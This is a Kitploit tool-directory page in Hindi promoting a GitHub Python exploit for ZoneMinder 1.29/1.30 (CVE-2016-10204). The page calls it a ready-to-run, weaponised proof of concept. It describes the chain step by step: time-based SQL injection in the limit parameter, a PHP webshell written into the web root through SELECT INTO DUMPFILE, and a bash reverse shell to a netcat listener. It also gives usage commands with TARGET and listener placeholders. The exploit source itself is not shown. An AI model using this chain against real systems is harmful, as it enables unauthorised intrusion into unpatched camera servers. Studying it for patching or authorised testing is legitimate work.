Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
zoneminder-1.29-1.30-rce-exploit — ZoneMinder 1.29/1.30 के लिए अनऑथेंटिकेटेड SQL इंजेक्शन से RCE एक्सप्लॉइट (CVE-2016-10204, EDB-41239)। Python में सिंगल-कमांड SQLi से वेबशेल से रिवर्स शेल PoC। | Kitploit
उपकरण/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

ZoneMinder 1.29/1.30 के लिए अनऑथेंटिकेटेड SQL इंजेक्शन से RCE एक्सप्लॉइट (CVE-2016-10204, EDB-41239)। Python में सिंगल-कमांड SQLi से वेबशेल से रिवर्स शेल PoC।

रिपॉजिटरी देखें
18घं 3मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ZoneMinder 1.29/1.30 SQLi से RCE एक्सप्लॉइट

ZoneMinder 1.29/1.30 के लिए एक तैयार-से-चलाने योग्य Python एक्सप्लॉइट जो अनऑथेंटिकेटेड SQL इंजेक्शन (CVE-2016-10204, EDB-41239) को एक इंटरैक्टिव रिवर्स शेल तक जोड़ता है।

यह एक ज्ञात, पैच किए गए CVE के लिए एक हथियारीकृत/स्वचालित PoC है, नया एक्सप्लॉइट नहीं।

इस बग के लिए EDB PoC SQLi पेलोड पर रुक जाता है या "इस पर sqlmap चलाओ" कहता है। यह एक्सप्लॉइट पूरी SQLi से वेबशेल से शेल श्रृंखला को एक पठनीय स्क्रिप्ट में पैक करता है।

यह क्या करता है

  1. index.php?view=request&request=log&task=query के limit POST पैरामीटर पर टाइम-बेस्ड (SLEEP) प्रोब के साथ इंजेक्शन की पुष्टि करता है।
  2. SELECT ... INTO DUMPFILE के माध्यम से वेब रूट में एक छोटा PHP वेबशेल लिखता है, कई सामान्य ZoneMinder/Apache पाथ आज़माता है।
  3. लाइव वेबशेल की जांच करता है, फिर आपके netcat लिसनर पर bash रिवर्स शेल भेजता है।

यह दो अड़चनों को संभालता है

  • DUMPFILE, OUTFILE नहीं। OUTFILE न्यूलाइन को एस्केप करता है और मल्टी-लाइन PHP को बिगाड़ देता है; DUMPFILE रॉ बाइट्स लिखता है, इसलिए वेबशेल वैध रहता है।
  • हर रन पर नया रैंडम फ़ाइलनाम। MySQL मौजूदा फ़ाइल को ओवरराइट करने से मना करता है, इसलिए एक निश्चित नाम पिछले रन के पुराने ड्रॉप से टकरा जाता है।

उपयोग

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

श्रेय

  • FOXMOLE (CVE-2016-10204 के लिए एडवाइज़री आधार)।
  • मूल PoC: Exploit-DB 41239।

लाइसेंस

MIT, देखें LICENSE।

टूल डाउनलोड करें